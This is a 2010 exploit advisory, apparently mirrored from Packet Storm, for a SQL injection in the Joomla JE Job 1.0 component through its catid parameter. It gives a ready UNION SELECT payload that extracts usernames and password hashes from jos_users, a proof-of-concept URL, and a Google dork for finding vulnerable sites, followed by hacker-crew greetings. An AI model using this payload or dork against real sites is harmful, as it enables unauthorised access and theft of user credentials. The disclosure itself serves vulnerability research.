Joomla JE Job 1.0 SQL Injection

🗓️ 28 May 2010 00:00:00Reported by v3n0mType

packetstorm🔗 packetstormsecurity.com👁 41 Views

Joomla Component com_jejob 1.0 SQL Injection Vulnerability in JE Job by v3n0

` ) ) ) ( ( ( ( ( ) )   
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(   
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())  
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\   
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)  
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ /   
\ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | ' <   
|_| \___/ \___| |_| /_/ \_\ \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\  
.WEB.ID  
-----------------------------------------------------------------------  
Joomla Component com_jejob 1.0 (catid) SQL Injection Vulnerability  
-----------------------------------------------------------------------  
Author : v3n0m  
Site : http://yogyacarderlink.web.id/  
Date : May, 29-2010  
Location : Jakarta, Indonesia  
Time Zone : GMT +7:00  
----------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Application : JE Job  
Vendor : http://joomlaextensions.co.in/  
License : GPLv2  
Version : 1.0 Lower versions may also be affected  
Google Dork : inurl:com_jejob  
  
User can search the job by Location or by Job Title or by Experience. User can   
also see the job category at the front page. Category wise jobs are displayed in it.  
----------------------------------------------------------------  
  
Exploitz:  
~~~~~~~  
-9999+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5+from+jos_users--  
  
  
SQLi p0c:  
~~~~~~~  
  
http://127.0.0.1/[path]/index.php?option=com_jejob&view=item&catid=[SQLi]  
----------------------------------------------------------------  
  
Shoutz:  
~~~~  
  
- 'malingsial banyak cakap, you skill off bullshit on '  
- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-  
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag  
- kiddies,whitehat,mywisdom,yadoy666,udhit  
- c4uR (besok² klo curhat jangan nangis lagi ah uR bruakakaka)  
- BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)  
- elicha cristia [ Mizz U so much... ]  
- Joss [at] hack0wn.com  
- #yogyacarderlink @irc.dal.net  
----------------------------------------------------------------  
Contact:  
~~~~  
  
v3n0m | YOGYACARDERLINK CREW | v3n0m666[at]live[live]com  
Homepage: http://yogyacarderlink.web.id/  
http://v3n0m.blogdetik.com/  
http://elich4.blogspot.com/ << Update donk >_<  
  
---------------------------[EOF]--------------------------------  
`

28 May 2010 00:00Current

0.2Low risk

Vulners AI Score0.2